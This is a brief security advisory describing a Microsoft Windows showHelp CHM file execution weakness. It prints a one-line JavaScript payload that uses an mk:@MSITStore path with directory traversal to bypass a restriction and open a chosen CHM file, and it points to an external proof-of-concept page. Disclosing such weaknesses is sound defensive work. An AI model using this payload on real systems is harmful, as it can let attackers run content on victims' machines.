Microsoft Windows showHelp CHM File Execution Weakness

Microsoft Windows showHelp CHM File Execution Weakness

The following is an example of how to bypass this restriction:

showHelp("mk:@MSITStore:iexplore.chm::..\\..\\..\\..\\chmfile.chm::/fileinchm.html");

A proof-of-concept is also available at the following location:

http://www.freewebs.com/arman2/showamp.htm